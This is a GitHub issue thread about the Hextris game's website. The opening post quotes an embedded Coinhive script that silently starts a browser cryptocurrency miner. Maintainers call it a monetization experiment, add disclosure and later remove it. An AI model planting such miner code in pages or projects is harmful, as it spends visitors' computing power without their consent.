### ISSUE TITLE
Bitcoin miner, seriously?

### ISSUE THREAD

**Issue by easyveazie** [Hextris/hextris#188]
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
        <script>
          var miner = new CoinHive.Anonymous('W9e1JbsYTHqCwImFfAEGfJJigBCWfYv2', {
              throttle:0.7
          });
          miner.start();
        </script>

**Comment by alanag13** [comment]
https://github.com/Hextris/hextris/commit/5a526e956847e0c52445b8d170d3fe5547197d99 Yeah this is kinda not cool.

**Comment by lengstrom** [comment]
Please see https://github.com/Hextris/hextris/issues/185 for discussion. If you have ideas on how to make this more transparent, you can give feedback there :)

**Comment by themichaelyang** [comment]
Both are developers for General Mills; Big Cereal taking down the little guys as usual....

**Comment by alanag13** [comment]
Thanks for the transparency! And yes, @easyveazie and I happen to work in the same department and noticed this together (though our jobs have very little to do with cereal 😃 ). 

That being said, despite this being disclosed on the about page, I feel like it' still very easy to miss. It might be a little bit more clear if you did this in say, a small banner above where users are actually playing the game.

**Comment by themichaelyang** [comment]
I definitely hear your concerns — I've gone ahead and made an update to the README, so it's more transparent about the use of Coinhive on the site. I've also removed Coinhive from the version hosted on [Github Pages](https://hextris.github.io/hextris/) (but not our primary website).

This was mainly an experiment to see if we could monetize this project a little bit without affecting the user experience. I'm not sure the experiment worked out, so we'll probably be moving towards more traditional ads later. 

(Update: we removed coinhive from the game in a later update, in case anybody is looking through these old issues. Plus I think coinhive has been shut down as well?)

**Comment by cibersheep** [comment]
I think mining is a better solution than ads if user is notified about it.
App works perfectly well even on mobile devices

**Comment by easyveazie** [comment]
Me commenting on this repo has nothing to do with my employer. I was simply interested in checking out the OSS game :) Hextris and Cereal are unrelated.

**Comment by easyveazie** [comment]
@themichaelyang and @lengstrom , I discovered it initially because my antivirus quarantined index.html on git clone. I have no problem with monetizing with crypto miners (better experience than ads TBH), but was really taken off-guard when I saw it on an OSS project. It felt predatory, because idiots like myself that clone first, review code later, are unintentionally mining.

**Comment by attogram** [comment]
FYI: a protest fork of Hextris, with all non-game material removed:  https://github.com/attogram/hextris-lite
